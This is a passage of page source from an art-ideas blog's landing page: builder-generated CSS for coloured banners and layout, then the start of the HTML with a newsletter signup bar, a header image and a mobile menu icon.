background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-1664443cdf0"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664443e9b9"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-teal-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-top: 3px !important; }[data-css="tve-u-166444524ca"] { height: calc(100% - 4px); margin-top: 0px !important; }[data-css="tve-u-1664445f930"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-teal-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664446a9e6"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-166444722c8"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664448b496"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/orange-banner-short.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-1664449b94b"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }#tve_editor [data-css="tve-u-166444a5add"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166444a8add"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/grass-green-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-166444b4886"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-emerald-green-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166444bae3d"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166444bfdca"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-emerald-green-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166444c4c3a"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166444ea37f"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-sky-blue-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166444fdadf"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }#tve_editor [data-css="tve-u-166445042e4"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644504dd0"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-ocean-blue-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-16644518ee1"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644519be7"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/orange-banner-short.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-16644524a25"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-sky-blue-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166445286bb"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664452a3f7"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664452ab0c"] { width: 296px; float: none; z-index: 3; position: relative; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664452b55d"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644537925"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-ocean-blue-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-16644538b88"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166445394f1"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-1664453f5a0"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166445b9f34"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/salmon-pink-long-banner.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-top: 35px !important; margin-bottom: 10px !important; }#tve_editor [data-css="tve-u-166445c6262"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 24px !important; }#tve_editor [data-css="tve-u-166445ca36c"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 24px !important; }[data-css="tve-u-166445cb800"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-teal-long-banner.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-top: 35px !important; margin-bottom: 10px !important; }#tve_editor [data-css="tve-u-166445ceb57"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 24px !important; }[data-css="tve-u-166445d0239"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/yellow-long-banner.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-top: 35px !important; margin-bottom: 10px !important; }[data-css="tve-u-166445f2ef5"] { margin-top: 35px !important; background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/art-ideas-for-the-whole-family2.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166445fa032"] { color: rgb(255, 255, 255) !important; font-size: 24px !important; }[data-css="tve-u-1664460e47f"] { float: none; width: 100%; max-width: 920px; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644611fcc"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644614b51"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644619c66"] { width: 100%; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-1664461c4c3"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664461df81"] { float: none; width: 100%; background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/lilac-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664461ede7"] { width: 289px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166446211cc"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/salmon-pink-banner-short.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-16644622174"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644622f38"] { width: 96%; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-16644624beb"] { color: rgb(255, 255, 255) !important; }[data-css="tve-u-16644626ae7"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/grass-green-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-16644627c7c"] { width: 297px; }#tve_editor [data-css="tve-u-1664462af3f"] { color: rgb(255, 255, 255) !important; }[data-css="tve-u-1664462c597"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/bubble-gum-pin-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664462d3f7"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664462efe7"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/todder-art-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-1664462fef5"] { color: rgb(255, 255, 255) !important; }[data-css="tve-u-1664463163b"] { width: 297px; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-16644632f84"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166446340d8"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-teal-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-top: 3px !important; }[data-css="tve-u-16644635120"] { width: 297px; }#tve_editor [data-css="tve-u-16644637b07"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644639576"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/orange-banner-short.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664463e726"] { width: 297px; }[data-css="tve-u-16644640706"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-emerald-green-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-16644642a2e"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644643e51"] { width: 297px; }#tve_editor [data-css="tve-u-16644646951"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166446480cb"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-sky-blue-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664465e256"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/salmon-pink-long-banner.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664466167b"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166446639a2"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-teal-long-banner.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-16644665f1e"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166446681f5"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664466a40e"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/yellow-long-banner.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664466cbab"] { max-width: 920px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-16644672a9b"] { color: rgb(255, 255, 255) !important; font-size: 24px !important; }[data-css="tve-u-166446773ef"] { width: 297px; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-1664467954b"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664467abab"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-ocean-blue-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664467b9da"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-1664467d2ec"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664467ebea"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-emerald-green-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664467fc15"] { width: 296px; float: none; z-index: 3; position: relative; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644681641"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/todder-art-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; margin-top: -2px !important; }#tve_editor [data-css="tve-u-16644682422"] { color: rgb(255, 255, 255) !important; }#tve_editor [data-css="tve-u-16644683922"] { color: rgb(255, 255, 255) !important; font-size: 24px !important; }[data-css="tve-u-1664468f651"] { width: 296px; }#tve_editor [data-css="tve-u-16644691d5b"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644693686"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/bubble-gum-pin-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-166446944d7"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644696100"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/lilac-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-16644696e17"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644697779"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-16644699440"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664469a717"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/orange-banner-short.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664469b787"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-1664469cf7a"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-sky-blue-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-1664469da4a"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-1664469ead1"] { width: 296px; float: none; z-index: 3; position: relative; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-1664469fda2"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166446a16b0"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/salmon-pink-banner-short.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-166446a2232"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166446a3df0"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/grass-green-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166446a4875"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }#tve_editor [data-css="tve-u-166446a651b"] { color: rgb(255, 255, 255) !important; font-size: 24px !important; }[data-css="tve-u-166446aa3b0"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166446ae11f"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-teal-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166446aec3b"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166446afc19"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-166446b3917"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-166446b4c0e"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-ocean-blue-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-166446b594b"] { width: 296px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166446b6fc1"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/bubble-gum-pin-short-banner.png") !important; background-size: cover !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-166446b808e"] { color: rgb(255, 255, 255) !important; font-size: 20px !important; }[data-css="tve-u-16644fc4418"] { max-width: 20%; }[data-css="tve-u-16644fc4437"] { max-width: 20%; }[data-css="tve-u-16644fc4457"] { max-width: 20.2%; }[data-css="tve-u-16644fc4479"] { max-width: 20%; }[data-css="tve-u-16644fc4498"] { max-width: 20%; }[data-css="tve-u-166451ce8ac"] { max-width: 1020px; }[data-css="tve-u-166445d79e7"] { background-color: rgb(255, 255, 255) !important; }#tve_editor [data-css="tve-u-1664b228e64"] { letter-spacing: 1px; color: rgb(113, 112, 112) !important; }#tve_editor [data-css="tve-u-1664b230da5"] { letter-spacing: 1px; color: rgb(113, 112, 112) !important; }#tve_editor [data-css="tve-u-1664b23318c"] { letter-spacing: 1px; color: rgb(113, 112, 112) !important; }#tve_editor [data-css="tve-u-1664b23632b"] { letter-spacing: 1px; color: rgb(113, 112, 112) !important; }#tve_editor [data-css="tve-u-16643446433"] > :first-child { color: rgb(113, 112, 112); }#tve_editor [data-css="tve-u-16643453c1f"] > :first-child { color: rgb(113, 112, 112); }#tve_editor [data-css="tve-u-16643450a35"] > :first-child { color: rgb(113, 112, 112); }[data-css="tve-u-16653c2aa64"] { background-image: linear-gradient(rgb(245, 212, 25), rgb(245, 212, 25)) !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-16653c37b4e"] { letter-spacing: 1px; color: rgb(255, 255, 255) !important; font-size: 20px !important; font-family: Karla !important; font-weight: 400 !important; }[data-css="tve-u-16653c42532"] { max-width: 86.9%; }[data-css="tve-u-16653c4254c"] { max-width: 13.1%; }[data-css="tve-u-16653c44486"] { max-width: 750px; float: none; width: 100%; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16653c48208"] { font-size: 28px; margin-left: auto; margin-right: auto; width: 28px; height: 28px; }#tve_editor [data-css="tve-u-16653c48208"] > :first-child { color: rgb(255, 255, 255); }[data-css="tve-u-16653c77c27"] { padding-top: 5px !important; padding-bottom: 5px !important; }#tve_editor [data-css="tve-u-1664344d0b1"] > :first-child { color: rgb(113, 112, 112); }}@media (max-width: 1023px){[data-css="tve-u-166445d79e7"] { background-color: rgb(255, 255, 255) !important; }[data-css="tve-u-166442f6b40"] { float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166442f5b73"] { float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166442f63db"] { float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644013340"] { float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644375d33"] { width: 296px; }[data-css="tve-u-16644009847"] { width: 296px; }[data-css="tve-u-1664400c05f"] { width: 296px; }[data-css="tve-u-166442efae6"] { float: none; margin-left: auto !important; margin-right: auto !important; }}@media (max-width: 767px){[data-css="tve-u-166445d79e7"] { background-color: rgb(255, 255, 255) !important; }#tve_editor [data-css="tve-u-166445fa032"] { font-size: 16px !important; }[data-css="tve-u-166442a1dc1"] { max-width: 350px; float: none; width: 100%; background-size: cover !important; background-attachment: scroll !important; background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-sky-blue-short-banner.png") !important; background-position: 50% 50% !important; background-repeat: no-repeat !important; margin-left: auto !important; margin-right: auto !important; margin-bottom: -10px !important; }[data-css="tve-u-16644619c66"] { width: 75%; }#tve_editor [data-css="tve-u-1664461c4c3"] { font-size: 14px !important; }[data-css="tve-u-1664461df81"] { max-width: none; background-size: auto !important; }[data-css="tve-u-1664461ede7"] { width: 75%; }[data-css="tve-u-166446211cc"] { background-size: auto !important; }#tve_editor [data-css="tve-u-16644622174"] { font-size: 14px !important; }[data-css="tve-u-16644622f38"] { width: 75%; }#tve_editor [data-css="tve-u-16644624beb"] { font-size: 14px !important; }[data-css="tve-u-16644626ae7"] { background-size: auto !important; }[data-css="tve-u-16644627c7c"] { width: 75%; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-1664462af3f"] { font-size: 14px !important; }[data-css="tve-u-1664462c597"] { background-size: auto !important; }[data-css="tve-u-1664462d3f7"] { width: 75%; }[data-css="tve-u-1664462efe7"] { background-size: auto !important; }#tve_editor [data-css="tve-u-1664462fef5"] { font-size: 14px !important; }[data-css="tve-u-1664463163b"] { width: 75%; }#tve_editor [data-css="tve-u-16644632f84"] { font-size: 14px !important; }[data-css="tve-u-166446340d8"] { background-size: auto !important; }[data-css="tve-u-16644635120"] { width: 75%; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-16644637b07"] { font-size: 14px !important; }[data-css="tve-u-16644639576"] { background-image: url(""), url("https://www.artbarblog.com/wp-content/uploads/2018/10/orange-banner-short.png") !important; background-size: auto !important; background-position: 50% 50% !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }[data-css="tve-u-1664463e726"] { width: 75%; float: none; z-index: 3; position: relative; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-16644640706"] { background-size: auto !important; }#tve_editor [data-css="tve-u-16644642a2e"] { font-size: 14px !important; }[data-css="tve-u-16644643e51"] { width: 75%; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-16644646951"] { font-size: 14px !important; }[data-css="tve-u-166446480cb"] { background-size: auto !important; }#tve_editor [data-css="tve-u-16644672a9b"] { font-size: 15px !important; }[data-css="tve-u-1664465e256"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/salmon-pink-banner-short.png") !important; background-size: cover !important; margin-top: 35px !important; margin-bottom: -10px !important; }[data-css="tve-u-166446773ef"] { width: 75%; }#tve_editor [data-css="tve-u-1664467954b"] { font-size: 16px !important; }[data-css="tve-u-1664467abab"] { background-size: auto !important; }[data-css="tve-u-1664467b9da"] { width: 75%; }#tve_editor [data-css="tve-u-1664467d2ec"] { font-size: 16px !important; }[data-css="tve-u-1664467ebea"] { background-size: auto !important; }[data-css="tve-u-1664467fc15"] { width: 75%; }[data-css="tve-u-16644681641"] { background-size: auto !important; }#tve_editor [data-css="tve-u-16644682422"] { font-size: 16px !important; }#tve_editor [data-css="tve-u-16644683922"] { font-size: 15px !important; }[data-css="tve-u-166446639a2"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/light-teal-short-banner.png") !important; background-size: cover !important; margin-top: 35px !important; margin-bottom: -10px !important; }[data-css="tve-u-1664468f651"] { width: 75%; float: none; margin-left: auto !important; margin-right: auto !important; }#tve_editor [data-css="tve-u-16644691d5b"] { font-size: 16px !important; }[data-css="tve-u-16644693686"] { background-size: auto !important; }[data-css="tve-u-166446944d7"] { width: 75%; }[data-css="tve-u-16644696100"] { background-size: auto !important; }#tve_editor [data-css="tve-u-16644696e17"] { font-size: 16px !important; }[data-css="tve-u-16644697779"] { width: 75%; }#tve_editor [data-css="tve-u-16644699440"] { font-size: 16px !important; }[data-css="tve-u-1664469a717"] { background-size: auto !important; }[data-css="tve-u-1664469b787"] { width: 75%; }[data-css="tve-u-1664469cf7a"] { background-size: auto !important; }#tve_editor [data-css="tve-u-1664469da4a"] { font-size: 16px !important; }[data-css="tve-u-1664469ead1"] { width: 75%; }#tve_editor [data-css="tve-u-1664469fda2"] { font-size: 16px !important; }[data-css="tve-u-166446a16b0"] { background-size: auto !important; }[data-css="tve-u-166446a2232"] { width: 75%; }[data-css="tve-u-166446a3df0"] { background-size: auto !important; }#tve_editor [data-css="tve-u-166446a4875"] { font-size: 16px !important; }#tve_editor [data-css="tve-u-166446a651b"] { font-size: 18px !important; }[data-css="tve-u-1664466a40e"] { background-image: url("https://www.artbarblog.com/wp-content/uploads/2018/10/todder-art-banner.png") !important; background-size: cover !important; margin-top: 35px !important; margin-bottom: -10px !important; }[data-css="tve-u-166446aa3b0"] { width: 75%; }[data-css="tve-u-166446ae11f"] { background-size: auto !important; }#tve_editor [data-css="tve-u-166446aec3b"] { font-size: 16px !important; }[data-css="tve-u-166446afc19"] { width: 75%; }#tve_editor [data-css="tve-u-166446b3917"] { font-size: 16px !important; }[data-css="tve-u-166446b4c0e"] { background-size: auto !important; }[data-css="tve-u-166446b594b"] { width: 75%; }[data-css="tve-u-166446b6fc1"] { background-size: auto !important; }#tve_editor [data-css="tve-u-166446b808e"] { font-size: 16px !important; }[data-css="tve-u-166450f92a1"] { margin-top: -40px !important; }[data-css="tve-u-16644614b51"] { margin-top: -35px !important; }[data-css="tve-u-166446681f5"] { margin-top: -35px !important; }}</style> <style type="text/css"> html { height: auto; } html.tcb-editor { overflow-y: initial; } body:before, body:after { height: 0 !important; } .thrv_page_section .out { max-width: none } .tve_wrap_all { position: relative; } </style> </head> <body class="home page-template-default page page-id-15673 tve_lp" style="" data-css="tve-u-166445d79e7"> <div class="wrp cnt bSe" style="display: none"> <div class="awr"></div> </div> <div class="tve_wrap_all" id="tcb_landing_page"> <div class="tve_post_lp tve_lp_blank_v2 tve_lp_template_wrapper" style=""> <div id="tve_flt" class="tve_flt"><div id="tve_editor" class="tve_shortcode_editor"><div class="thrv_wrapper thrv-page-section" style=""> <div class="tve-page-section-out" data-css="tve-u-16653c2aa64"></div> <div class="tve-page-section-in tve_empty_dropzone"><div class="thrv_wrapper thrv-columns" style="" data-css="tve-u-16653c44486"><div class="tcb-flex-row tcb-resized tcb--cols--2" data-css="tve-u-16653c77c27"><div class="tcb-flex-col" data-css="tve-u-16653c42532" style=""><div class="tcb-col"><div class="thrv_wrapper thrv_text_element" style=""><p data-css="tve-u-16653c37b4e" style="text-align: center;">GET MY FREE NEWSLETTER WITH BI-MONTHLY ART INSPIRATION&nbsp;</p></div></div></div><div class="tcb-flex-col" data-css="tve-u-16653c4254c" style=""><div class="tcb-col" style=""><div class="thrv_wrapper thrv_icon tcb-icon-display tve_evt_manager_listen tve_et_click tve_ea_thrive_lightbox" data-css="tve-u-16653c48208" data-tcb-events="__TCB_EVENT_[{&quot;config&quot;:{&quot;l_anim&quot;:&quot;instant&quot;,&quot;l_id&quot;:&quot;13891&quot;},&quot;a&quot;:&quot;thrive_lightbox&quot;,&quot;t&quot;:&quot;click&quot;}]_TNEVE_BCT__"><svg class="tcb-icon" viewBox="0 0 448 512" data-id="icon-arrow-right-light" data-name="arrow-right"> <path d="M216.464 36.465l-7.071 7.07c-4.686 4.686-4.686 12.284 0 16.971L387.887 239H12c-6.627 0-12 5.373-12 12v10c0 6.627 5.373 12 12 12h375.887L209.393 451.494c-4.686 4.686-4.686 12.284 0 16.971l7.071 7.07c4.686 4.686 12.284 4.686 16.97 0l211.051-211.05c4.686-4.686 4.686-12.284 0-16.971L233.434 36.465c-4.686-4.687-12.284-4.687-16.97 0z"></path> </svg></div></div></div></div></div></div> </div><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166434051f2" style=""><span class="tve_image_frame" style="width: 100%;"><img class="tve_image wp-image-12700" alt="" width="780" height="414" title="header2" data-id="12700" src="//www.artbarblog.com/wp-content/uploads/2017/06/header2.png" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2017/06/header2.png 780w, https://www.artbarblog.com/wp-content/uploads/2017/06/header2-350x186.png 350w, https://www.artbarblog.com/wp-content/uploads/2017/06/header2-595x316.png 595w, https://www.artbarblog.com/wp-content/uploads/2017/06/header2-300x159.png 300w, https://www.artbarblog.com/wp-content/uploads/2017/06/header2-768x408.png 768w" sizes="(max-width: 780px) 100vw, 780px" /></span></div><div class="thrv_wrapper thrv_widget_menu tve-custom-menu-upgrade tve-mobile-dropdown tve-menu-template-light-tmp-first tve-menu-style-none tve-dropdown-icon-style_1 tcb-desktop-hidden" data-css="tve-u-166445e05c5" tcb-template-name="Basic" tcb-template-id="light-tmp-first" style="" data-tve-switch-icon="tablet,mobile"> <div class="thrive-shortcode-config" style="display: none !important"></div><div class="thrive-shortcode-html thrive-shortcode-html-editable tve_clearfix" data-css='tve-u-166445e05c5'><a class="tve-m-trigger t_tve_horizontal tve_red" href="javascript:void(0)"><div class="thrv_wrapper thrv_icon tve-draggable tve-droppable tcb-icon-open tve-trigger-active" data-not-changeable="true"><svg class="tcb-icon" viewBox="0 0 24 24" data-name="align-justify"><g><g><path class="st0" d="M23,13H1c-0.6,0-1-0.4-1-1s0.4-1,1-1h22c0.6,0,1,0.4,1,1S23.6,13,23,13z"/></g><g><path class="st0" d="M23,6.7H1c-0.6,0-1-0.4-1-1s0.4-1,1-1h22c0.6,0,1,0.4,1,1S23.6,6.7,23,6.7z"/></g><g><path class="st0" d="M23,19.3H1c-0.6,0-1-0.4-1-1s0.4-1,1-1h22c0.6,0,1,0.4,1,1S23.6,19.3,23,19.3z"/></g></g></svg></div><div class="thrv_wrapper thrv_icon tve-draggable tve-droppable tcb-icon-close" data-not-changeable="true"><svg class="tcb-icon" viewBox="0 0 24 24" data-name="close"><path class="st0" 